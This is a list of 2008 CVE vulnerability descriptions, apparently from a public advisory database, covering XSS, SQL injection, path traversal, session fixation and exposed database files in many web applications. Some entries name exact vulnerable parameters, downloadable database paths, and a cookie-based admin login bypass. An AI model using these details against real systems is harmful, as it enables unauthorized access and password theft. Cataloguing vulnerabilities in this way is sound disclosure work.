[CVE-2008-6370] Cross-site scripting (XSS) vulnerability in default.asp in Ocean12 Contact Manager Pro 1.02 allows remote attackers to inject arbitrary web script or HTML via the DisplayFormat parameter.
[CVE-2008-6360] Cross-site scripting (XSS) vulnerability in the userranks feature in modules/system/admin.php in ImpressCMS 1.0.2 final allows remote attackers to inject arbitrary web script or HTML via the rank_title parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-6359] Cross-site scripting (XSS) vulnerability in index.php in Max's Guestbook allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, and (3) message parameters.
[CVE-2008-6357] MyCal Personal Events Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to mycal.mdb.
[CVE-2008-6356] evCal Events Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to (1) evcal.mdb and (2) evcal97.mdb.
[CVE-2008-6355] The Net Guys ASPired2Protect stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to ASPired2Protect.mdb.
[CVE-2008-6354] The Net Guys ASPired2poll stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to ASPired2poll.mdb.
[CVE-2008-6351] Cross-site scripting (XSS) vulnerability in listtest.php in TurnkeyForms Local Classifieds allows remote attackers to inject arbitrary web script or HTML via the r parameter.
[CVE-2008-6346] Cross-site scripting (XSS) vulnerability in the DR Wiki (dr_wiki) extension 1.7.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6343] Cross-site scripting (XSS) vulnerability in the TU-Clausthal ODIN (tuc_odin) extension 0.0.1, 0.1.0, 0.1.1, and 0.2.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6341] Cross-site scripting (XSS) vulnerability in the SB Universal Plugin (SBuniplug) extension 2.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6340] Cross-site scripting (XSS) vulnerability in the Vox populi (mv_vox_populi) extension 0.3.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6338] SQL injection vulnerability in the WEBERkommunal Facilities (wes_facilities) extension 2.0 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2008-6334] Directory traversal vulnerability in download.php in eMetrix Extract Website allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.
[CVE-2008-6325] Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Classifieds Script allow remote attackers to inject arbitrary web script or HTML via the (1) radio parameter to showcategory.php, (2) msg parameter to advertisers/signinform.php, (3) radio parameter to gallery.php, (4) msg parameter to lostpassword.php, (5) radio parameter to showcategory.php, (6) msg parameter to admin/adminhome.php, and (7) msg parameter to admin/index.php. NOTE: a different signinform.php file is already covered by CVE-2008-6306.
[CVE-2008-6321] CF Shopkart 5.2.2 stores cfshopkart52.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information, such as usernames and passwords, via a direct request.
[CVE-2008-6306] Cross-site scripting (XSS) vulnerability in signinform.php in Softbiz Classifieds Script allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6300] Galatolo WebManager 1.3a allows remote attackers to bypass authentication and gain administrative access by setting the (1) gwm_user and (2) gwm_pass cookies to admin. NOTE: the provenance of this information is unknown.
[CVE-2008-6299] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! 1.5.7 and earlier allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) the title and description parameters to the com_weblinks module and (2) unspecified vectors in the com_content module related to "article submission."
[CVE-2008-6297] Cross-site scripting (XSS) vulnerability in order.php in DHCart allows remote attackers to inject arbitrary web script or HTML via the (1) domain and (2) d1 parameters.
[CVE-2008-6295] Multiple cross-site scripting (XSS) vulnerabilities in Camera Life 2.6.2b8 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.php and (2) rss.php.
[CVE-2008-6288] Directory traversal vulnerability in download.php in Interface Medien ibase 2.03 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.
[CVE-2008-6283] Cross-site scripting (XSS) vulnerability in Subtext 2.0 allows remote attackers to inject arbitrary web script or HTML via a comment, related to "the feature which converts URLs to anchor tags."
[CVE-2008-6280] Cross-site scripting (XSS) vulnerability in apply.cgi on the Linksys WRT160N allows remote attackers to inject arbitrary web script or HTML via the action parameter in a DHCP_Static operation.
[CVE-2008-6278] Multiple cross-site scripting (XSS) vulnerabilities in product.php in RakhiSoftware Price Comparison Script (aka Shopping Cart) allow remote attackers to inject arbitrary web script or HTML via the (1) category_id and (2) subcategory_id parameters.
[CVE-2008-6275] Cross-site scripting (XSS) vulnerability in the User Karma module 5.x before 5.x-1.13 and 6.x before 6.x-1.0-beta1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified messages.
[CVE-2008-6268] SQL injection vulnerability in detail.php in WEBBDOMAIN Multi Languages WebShop Online 1.02 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-6267] Cross-site scripting (XSS) vulnerability in detail.php in Multi Languages WebShop Online 1.02 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2008-6266] SQL injection vulnerability in links.php in Appalachian State University phpWebSite allows remote attackers to execute arbitrary SQL commands via the cid parameter in a viewlink action.
[CVE-2008-6259] Cross-site scripting (XSS) vulnerability in search.asp in QuadComm Q-Shop 3.0, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the srkeys parameter.
[CVE-2008-6250] SQL injection vulnerability in Comdev Web Blogger 4.1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the arcmonth parameter to a blog page.
[CVE-2008-6249] SQL injection vulnerability in plugins/users/index.php in Galatolo WebManager 1.3a and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-6248] Cross-site scripting (XSS) vulnerability in all.php in Galatolo WebManager 1.3a and earlier allows remote attackers to inject arbitrary web script or HTML via the tag parameter.
[CVE-2008-6246] SQL injection vulnerability in category.php in Scripts For Sites (SFS) EZ Webring allows remote attackers to execute arbitrary SQL commands via the cat parameter.
[CVE-2008-6240] Cross-site scripting (XSS) vulnerability in data/views/index.html in OpenEdit Digital Asset Management (DAM) before 5.2014 allows remote attackers to inject arbitrary web script or HTML via the catalogid parameter.
[CVE-2008-6238] Cross-site scripting (XSS) vulnerability in archive/savedqueries/savequeryfinish.html in OpenEdit Digital Asset Management (DAM) before 5.2014 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2008-6217] Cross-site scripting (XSS) vulnerability in index.php in Extrakt Framework 0.7 allows remote attackers to inject arbitrary web script or HTML via the plugins[file][id] parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6215] Cross-site scripting (XSS) vulnerability in cadena_ofertas_ext.php in Venalsur Booking Centre Booking System for Hotels Group allows remote attackers to inject arbitrary web script or HTML via the OfertaID parameter.
[CVE-2008-6212] Cross-site scripting (XSS) vulnerability in admin.php in Php-Stats 0.1.9.1 allows remote attackers to inject arbitrary web script or HTML via the (1) sel_mese and (2) sel_anno parameters in a systems action. NOTE: the provenance of this information is unknown.
[CVE-2008-6211] Multiple cross-site scripting (XSS) vulnerabilities in PhpForums.net mcGallery 1.1 allow remote attackers to inject arbitrary web script or HTML via the lang parameter to (1) admin.php, (2) index.php, (3) sess.php, (4) stats.php, (5) detail.php, (6) resize.php, and (7) show.php. NOTE: the provenance of this information is unknown.
[CVE-2008-6208] Cross-site scripting (XSS) vulnerability in submitnews.php in e107 CMS 0.7.11 allows remote attackers to inject arbitrary web script or HTML via the (1) author_name, (2) itemtitle, and (3) item parameters. NOTE: the provenance of this information is unknown.
[CVE-2008-6205] Cross-site scripting (XSS) vulnerability in seeurl.php in Xavier Flahaut URLStreet 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) language, (2) order, and (3) filter parameters. NOTE: the provenance of this information is unknown.
[CVE-2008-6200] Multiple cross-site scripting (XSS) vulnerabilities in Swiki 1.5 allow remote attackers to inject arbitrary web script or HTML via (1) the query string and (2) a new wiki entry.
[CVE-2008-6199] 2532designs 2532|Gigs 1.2.2 and earlier allows remote attackers to trigger a backup and obtain sensitive information via a direct request to backup.php, which creates backup.sql under the web root with insufficient access control.
[CVE-2008-6192] Multiple cross-site scripting (XSS) vulnerabilities in unspecified Portlets in Sun Java System Portal Server 7.0 and 7.1 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-6190] Cross-site scripting (XSS) vulnerability in index.php in EEBCMS 0.95 allows remote attackers to inject arbitrary web script or HTML via the content parameter.
[CVE-2008-6174] Cross-site scripting (XSS) vulnerability in admin/postlister/index.php in Jetbox CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the liste parameter.
[CVE-2008-6173] Cross-site scripting (XSS) vulnerability in fullscreen.php in ClipShare Pro 4.0 allows remote attackers to inject arbitrary web script or HTML via the title parameter.
[CVE-2008-6170] Cross-site scripting (XSS) vulnerability in Drupal 5.x before 5.12 and 6.x before 6.6 allows remote authenticated users with create book content or edit node book hierarchy permissions to inject arbitrary web script or HTML via the book page title.
[CVE-2008-6169] Cross-site request forgery (CSRF) vulnerability in the Localization client 5.x before 5.x-1.1 and 6.x before 6.x-1.6 and the Localization server 5.x before 5.x-1.0-alpha5 and 6.x before 6.x-alpha2, modules for Drupal, allows remote attackers to perform unauthorized actions as administrators via unspecified vectors related to the "local translation submission interface."
[CVE-2008-6168] Cross-site scripting (XSS) vulnerability in search.php in miniPortail 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via an unspecified argument, probably the search string.
[CVE-2008-6164] Cross-site scripting (XSS) vulnerability in index.php in DreamCost HostAdmin 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2008-6161] Cross-site scripting (XSS) vulnerability in WOW Raid Manager (WRM) before 3.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6153] SQL injection vulnerability in Photo.asp in Jay Patel Pixel8 Web Photo Album 3.0 allows remote attackers to execute arbitrary SQL commands via the AlbumID parameter.
[CVE-2008-6147] ForumApp 3.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) data/8690.mdb or (2) data/8690BAK.mdb.
[CVE-2008-6144] Multiple cross-site scripting (XSS) vulnerabilities in the WEC Discussion Forum (wec_discussion) extension 1.7.0 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-3029.
[CVE-2008-6139] Directory traversal vulnerability in faqsupport/wce.download.php in WebBiscuits Modules Controller 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the download parameter.
[CVE-2008-6138] PHP remote file inclusion vulnerability in adminhead.php in WebBiscuits Modules Controller 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter.
[CVE-2008-6135] Cross-site scripting (XSS) vulnerability in EveryBlog 5.x and 6.x, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6131] Session fixation vulnerability in moziloWiki 1.0.1 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2008-6130] Cross-site scripting (XSS) vulnerability in index.php in moziloWiki 1.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) action and (2) page parameters.
[CVE-2008-6128] Session fixation vulnerability in moziloCMS 1.10.2 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2008-6127] Multiple cross-site scripting (XSS) vulnerabilities in moziloCMS 1.10.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) page and (2) query parameters to (a) index.php, (3) cat and (4) file parameters to (b) download.php, (5) gal parameter to gallery.php, and the (6) URL to admin/login.php.
[CVE-2008-6125] Unspecified vulnerability in the user editing interface in Moodle 1.5.x, 1.6 before 1.6.6, and 1.7 before 1.7.3 allows remote authenticated users to gain privileges via unknown vectors.
[CVE-2008-6113] Cross-site scripting (XSS) vulnerability in SemanticScuttle before 0.90 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the (1) username and (2) profile page.
[CVE-2008-6108] Cross-site scripting (XSS) vulnerability in result.php in Galatolo WebManager (GWM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the key parameter.
[CVE-2008-6106] Cross-site request forgery (CSRF) vulnerability in IBM Workplace for Business Controls and Reporting 2.x and IBM Workplace Web Content Management 6.x has unknown impact and remote attack vectors. NOTE: some of these details are obtained from third party information.
[CVE-2008-6105] Cross-site scripting (XSS) vulnerability in IBM Workplace for Business Controls and Reporting 2.x and IBM Workplace Web Content Management 6.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2008-6101] SQL injection vulnerability in click.php in Adult Banner Exchange Website allows remote attackers to execute arbitrary SQL commands via the targetid parameter.
[CVE-2008-6097] Multiple cross-site scripting (XSS) vulnerabilities in WikyBlog before 1.7.1 allow remote attackers to inject arbitrary web script or HTML via the (1) key parameter to index.php/Special/Main/keywordSearch, (2) revNum parameter to index.php/Edit/Main/Home, (3) to parameter to index.php/Special/Main/WhatLinksHere, (4) user parameter to index.php/Special/Main/UserEdits, and (5) the PATH_INFO to index.php.
[CVE-2008-6095] Cross-site scripting (XSS) vulnerability in surveillanceView.htm in OpenNMS 1.5.94 allows remote attackers to inject arbitrary web script or HTML via the viewName parameter.
[CVE-2008-6094] Cross-site scripting (XSS) vulnerability in user.do in Celoxis Technologies Celoxis allows remote attackers to inject arbitrary web script or HTML via the ni.smessage parameter.
[CVE-2008-6087] Cross-site scripting (XSS) vulnerability in topic.php in Camera Life 2.6.2b4 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2008-6066] Multiple PHP remote file inclusion vulnerabilities in Meet#Web 0.8 allow remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) modules.php, (2) ManagerResource.class.php, (3) ManagerRightsResource.class.php, (4) RegForm.class.php, (5) RegResource.class.php, and (6) RegRightsResource.class.php in classes/. NOTE: the provenance of this information is unknown.
[CVE-2008-6062] Cross-site scripting (XSS) vulnerability in ActionScript in arbitrary Shockwave Flash (SWF) files created by Adobe Dreamweaver, when the Insert Flash Video feature is used, allows remote attackers to inject arbitrary web script or HTML via an asfunction: URI in the skinName parameter. NOTE: this may overlap CVE-2007-6242, CVE-2007-6244, or CVE-2007-6637.
[CVE-2008-6059] xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism.
[CVE-2008-6057] Doug Luxem Liberum Help Desk 0.97.3 stores db/helpdesk2000.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
[CVE-2008-6056] Multiple cross-site scripting (XSS) vulnerabilities in World Recipe 2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) n parameter to emailrecipe.aspx, (2) id parameter to recipedetail.aspx, and the (3) catid parameter to validatefieldlength.aspx.
[CVE-2008-6055] PreProjects Pre Classified Listings stores pclasp.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
[CVE-2008-6054] PreProjects Pre Courier and Cargo Business stores dbcourior.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
[CVE-2008-6053] PreProjects Pre Resume Submitter stores onlineresume.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
[CVE-2008-6052] PreProjects Pre E-Learning Portal stores db_elearning.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
[CVE-2008-6051] MetaCart Free stores metacart.mdb under the web root with insufficient access control, which allows remote attackers to obtain usernames and passwords via a direct request.
[CVE-2008-6047] Cross-site scripting (XSS) vulnerability in ADbNewsSender before 1.5.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) subscribing and (2) unsubscribing.
[CVE-2008-6045] Session fixation vulnerability in shopping_cart.php in xt:Commerce 3.0.4 and earlier allows remote attackers to hijack web sessions by setting the XTCsid parameter.
[CVE-2008-6044] Cross-site scripting (XSS) vulnerability in advanced_search_result.php in xt:Commerce 3.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2008-6041] Multiple cross-site scripting (XSS) vulnerabilities in Index.asp in Dataspade 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ViewName, (2) TableName, (3) OrderBy, and (4) FilterField parameters.
[CVE-2008-6039] Session fixation vulnerability in BLUEPAGE CMS 2.5 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2008-6035] Cross-site scripting (XSS) vulnerability in dispatch.php in Achievo 1.3.2-STABLE allows remote attackers to inject arbitrary web script or HTML via the atknodetype parameter.
[CVE-2008-6034] Cross-site scripting (XSS) vulnerability in dispatch.php in Achievo 1.3.2 allows remote attackers to inject arbitrary web script or HTML via the atkaction parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6027] Multiple cross-site scripting (XSS) vulnerabilities in index.php in BLUEPAGE CMS 2.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) whl, (2) var_1, and (3) search parameters.
[CVE-2008-6008] hyBook Guestbook Script stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing a password via a direct request for hyBook.mdb.
[CVE-2008-6005] Multiple buffer overflows in the CheckUniqueName function in W3C Amaya Web Browser 10.0.1, and possibly other versions including 11.0.1, might allow remote attackers to execute arbitrary code via "duplicated" attribute value inputs.
[CVE-2008-6004] Cross-site scripting (XSS) vulnerability in search.php in AJ Auction Pro Platinum 2 allows remote attackers to inject arbitrary web script or HTML via the product parameter.
[CVE-2008-6002] Absolute path traversal vulnerability in sendfile.php in web-cp 0.5.7, when register_globals is enabled, allows remote attackers to read arbitrary files via a full pathname in the filelocation parameter.
[CVE-2008-5999] Cross-site scripting (XSS) vulnerability in the Ajax Checklist module 5.x before 5.x-1.1 for Drupal allows remote authenticated users, with create and edit permissions for posts, to inject arbitrary web script or HTML via unspecified vectors involving the ajax_checklist filter.
[CVE-2008-5996] Cross-site scripting (XSS) vulnerability in the Simplenews module 5.x before 5.x-1.5 and 6.x before 6.x-1.0-beta4, a module for Drupal, allows remote authenticated users, with "administer taxonomy" permissions, to inject arbitrary web script or HTML via a Newsletter category field.
[CVE-2008-5995] Cross-site scripting (XSS) vulnerability in the freeCap CAPTCHA (sr_freecap) extension before 1.0.4 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5994] Cross-site scripting (XSS) vulnerability in index.php in Check Point Connectra NGX R62 HFA_01 allows remote attackers to inject arbitrary web script or HTML via the dir parameter. NOTE: the provenance of this information is unknown
[CVE-2008-5987] Untrusted search path vulnerability in the Python interface in Eye of GNOME (eog) 2.22.3, and possibly other versions, allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983).
[CVE-2008-5985] Untrusted search path vulnerability in the Python interface in Epiphany 2.22.3, and possibly other versions, allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983).
[CVE-2008-5981] PacPoll 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) poll.mdb or (2) poll97.mdb.
[CVE-2008-5980] Ocean12 Mailing List Manager Gold stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for o12mail.mdb.
[CVE-2008-5979] Cross-site scripting (XSS) vulnerability in default.asp in Ocean12 Mailing List Manager Gold allows remote attackers to inject arbitrary web script or HTML via the Email parameter.
[CVE-2008-5977] SQL injection vulnerability in siteadmin/forgot.php in PHP JOBWEBSITE PRO allows remote attackers to execute arbitrary SQL commands via the adname parameter in a Submit action.
[CVE-2008-5976] Multiple cross-site scripting (XSS) vulnerabilities in siteadmin/forgot.php in PHP JOBWEBSITE PRO allow remote attackers to inject arbitrary web script or HTML via (1) the adname parameter in a Submit action or (2) the UserName field.
[CVE-2008-5973] SQL injection vulnerability in login.aspx in Active Web Mail 4.0 allows remote attackers to execute arbitrary SQL commands via the password parameter.
[CVE-2008-5971] Cross-site scripting (XSS) vulnerability in profile_social.php in i-Net Solution Orkut Clone allows remote authenticated users to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-5967] admin/index.php in PHP iCalendar 2.3.4, 2.24, and earlier does not require administrative authentication for an addupdate action, which allows remote attackers to upload a calendar (aka .ics) file with arbitrary content to the calendars/ directory outside the web root.
[CVE-2008-5964] Session fixation vulnerability in Social ImpressCMS before 1.1.1 RC1 allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2008-5961] Cross-site scripting (XSS) vulnerability in index.php in Tribiq CMS Community 5.0.10B and 5.0.11E allows remote attackers to inject arbitrary web script or HTML via the cID parameter in a document action. NOTE: the provenance of this information is unknown
[CVE-2008-5956] Wbstreet (aka PHPSTREET Webboard) 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database credentials via a direct request to connect.inc.
[CVE-2008-5955] SQL injection vulnerability in show.php in Wbstreet (aka PHPSTREET Webboard) 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-5951] ASP Template Creature stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for workDB/templatemonster.mdb.
[CVE-2008-5944] Cross-site scripting (XSS) vulnerability in modules.php in NavBoard 16 (2.6.0) allows remote attackers to inject arbitrary web script or HTML via the module parameter.
[CVE-2008-5942] Multiple cross-site scripting (XSS) vulnerabilities in MODx before 0.9.6.3 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the preserveUrls function and (2) "username input." NOTE: vector 2 may be related to CVE-2008-5939.
[CVE-2008-5939] Cross-site scripting (XSS) vulnerability in index.php in MODx CMS 0.9.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in the username field, possibly related to snippet.ditto.php. NOTE: some sources list the id parameter as being affected, but this is probably incorrect based on the original disclosure.
[CVE-2008-5935] Facto stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for database/facto.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5934] SQL injection vulnerability in index.php in CMS ISWEB 3.0 allows remote attackers to execute arbitrary SQL commands via the id_sezione parameter.
[CVE-2008-5933] Multiple cross-site scripting (XSS) vulnerabilities in index.php in CMS ISWEB 3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the strcerca parameter (aka the input field for the cerca action) or (2) the id_oggetto parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-5932] CodeAvalanche FreeForum stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for _private/CAForum.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5931] The Net Guys ASPired2Blog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for admin/blog.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5929] VP-ASP Shopping Cart 6.50 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database containing the password via a direct request for database/shopping650.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5925] ASP-DEv XM Events Diary stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for diary.mdb.
[CVE-2008-5920] The create_anchors function in utils.inc in WebSVN 1.x allows remote attackers to execute arbitrary PHP code via a crafted username that is processed by the preg_replace function with the eval switch.
[CVE-2008-5919] Directory traversal vulnerability in rss.php in WebSVN 2.0 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to overwrite arbitrary files via directory traversal sequences in the rev parameter.
[CVE-2008-5918] Cross-site scripting (XSS) vulnerability in the getParameterisedSelfUrl function in index.php in WebSVN 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2008-5917] Cross-site scripting (XSS) vulnerability in the XSS filter (framework/Text_Filter/Filter/xss.php) in Horde Application Framework 3.2.2 and 3.3, when Internet Explorer is being used, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to style attributes.
[CVE-2008-5916] gitweb/gitweb.perl in gitweb in Git 1.6.x before 1.6.0.6, 1.5.6.x before 1.5.6.6, 1.5.5.x before 1.5.5.6, 1.5.4.x before 1.5.4.7, and other versions after 1.4.3 allows local repository owners to execute arbitrary commands by modifying the diff.external configuration variable and executing a crafted gitweb query.
[CVE-2008-5915] An unspecified function in the JavaScript implementation in Google Chrome creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
[CVE-2008-5914] An unspecified function in the JavaScript implementation in Apple Safari creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
[CVE-2008-5912] An unspecified function in the JavaScript implementation in Microsoft Internet Explorer creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
[CVE-2008-5901] iyzi Forum 1.0 beta 3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing a password via a direct request for db/iyziforum.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5900] CodeAvalanche Articles stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAArticles.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5899] CodeAvalanche FreeForAll stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAFFAPage.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5898] CodeAvalanche Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CADirectory.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5897] CodeAvalanche FreeWallpaper stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAFreeWallpaper.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5896] CodeAvalanche RateMySite stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CARateMySite.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5893] Cross-site scripting (XSS) vulnerability in admin_dblayers.asp in ClickAndEmail allows remote attackers to inject arbitrary web script or HTML via the tablename parameter in an update action.
[CVE-2008-5891] Cross-site scripting (XSS) vulnerability in the profile editing functionality in Injader before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2008-5889] Cross-site scripting (XSS) vulnerability in user.asp in Click&Rank allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2008-5886] TAKempis Discussion Web 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing a password via a direct request for _private/discussion.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5885] The Net Guys ASPired2Quote stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for admin/quote.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2008-5879] Cross-site scripting (XSS) vulnerability in index.php in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, allows remote attackers to inject arbitrary web script or HTML via the page parameter and other unspecified vectors.
[CVE-2008-5878] Multiple directory traversal vulnerabilities in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allow remote attackers to include and execute arbitrary files via a .. (dot dot) in the (1) boxname parameter to theme/superchrome/box.php and the (2) theme parameter to phpclanwebsite/footer.php.
[CVE-2008-5877] Multiple SQL injection vulnerabilities in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php, (2) form_id parameter to pcw/processforms.php, (3) pcwlogin and (4) pcw_pass parameters to pcw/setlogin.php, (5) searchvalue parameter to pcw/downloads.php, and the (6) searchvalue and (7) whichfield parameter to pcw/downloads.php, a different vector than CVE-2006-0444.
[CVE-2008-5869] Cross-site scripting (XSS) vulnerability in the Proxim Wireless Tsunami MP.11 2411 with firmware 3.0.3 allows remote authenticated users to inject arbitrary web script or HTML via the system.sysName.0 SNMP OID.
[CVE-2008-5862] Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410 build 2132 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the URI.
[CVE-2008-5858] Multiple cross-site scripting (XSS) vulnerabilities in KnowledgeTree before 3.5.4a allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2007-4281.
[CVE-2008-5855] myPHPscripts Login Session 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to discover usernames, e-mail addresses, and password hashes via a direct request for users.txt.
